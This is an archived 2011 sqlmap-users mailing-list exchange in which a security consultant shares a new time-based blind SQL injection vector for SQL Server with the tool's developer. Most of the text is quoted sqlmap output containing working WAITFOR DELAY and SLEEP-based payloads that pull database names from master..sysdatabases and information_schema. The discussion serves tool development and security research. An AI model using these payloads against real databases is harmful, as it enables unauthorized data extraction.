Re: [sqlmap-users] New SQL Server blind test
From: Miroslav S. <mir...@gm...> - 2011-01-18 02:05:55
Well, I've apologized already. I realized 15 minutes ago that this really is a new SQL injection vector. You can find yourself in the latest revision commit of the doc/THANKS file.

kr

On Tue, Jan 18, 2011 at 2:59 AM, Steve Pinkham <ste...@gm...> wrote:
> On 01/17/2011 08:25 PM, Miroslav Stampar wrote:
>> Ok, fair enough.
>>
>> Please just send one of the payloads used for data retrieval (something
>> like this one):
>>
>> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290)
>>
>> You'll see them with -v 3. You can censor table names. Please, I just
>> want to see something workable used for data retrieval (just spot
>> those payloads with '>' inside).
>>
>> kr
>
> Since you seem anxious, I'll send the warm-up. Hasn't hit the good part
> yet. ;-)
>
> [09:41:40] [INFO] fetching database names
> [09:41:40] [INFO] fetching number of databases
> [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:41:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
> [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:37] [INFO] retrieved: 24
> [09:43:37] [DEBUG] performed 10 queries in 117 seconds
>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com        |
> | GPG public key ID CD31CAFB          |

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia